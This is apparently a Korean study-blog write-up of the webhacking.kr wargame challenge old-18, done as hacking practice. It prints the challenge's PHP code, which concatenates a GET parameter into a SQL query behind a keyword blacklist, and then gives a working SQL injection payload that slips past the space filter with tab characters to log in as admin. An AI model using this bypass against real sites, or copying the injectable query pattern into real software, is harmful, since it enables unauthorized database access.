Notice
Recent Posts
Recent Comments
Link
«   2024/11   »
1 2
3 4 5 6 7 8 9
10 11 12 13 14 15 16
17 18 19 20 21 22 23
24 25 26 27 28 29 30
Archives
Today
Total
관리 메뉴

아모에요

[webhacking.kr] old-18 본문

Study/Hacking

[webhacking.kr] old-18

dys4nt 2023. 6. 14. 17:34

PHP 코드가 주어진다.

<?php
if($_GET['no']){
  $db = dbconnect();
  if(preg_match("/ |\/|\(|\)|\||&|select|from|0x/i",$_GET['no'])) exit("no hack");
  $result = mysqli_fetch_array(mysqli_query($db,"select id from chall18 where id='guest' and no=$_GET[no]")); // admin's no = 2

  if($result['id']=="guest") echo "hi guest";
  if($result['id']=="admin"){
    solve(18);
    echo "hi admin!";
  }
}
?>

admin의 no가 2이므로 스페이스 필터링은 tab(%09)로 우회하고 or no=2를 붙이자.

 

payload = /index.php?no=123%09or%09no=2

 

입력하면 문제가 풀리게 된다.

 

 

'Study > Hacking' 카테고리의 다른 글

[webhacking.kr] old-20  (0) 2023.06.14
[webhacking.kr] old-19  (0) 2023.06.14
[webhacking.kr] old-17  (0) 2023.06.14
[webhacking.kr] old-16  (0) 2023.06.14
[webhacking.kr] old-15  (0) 2023.06.14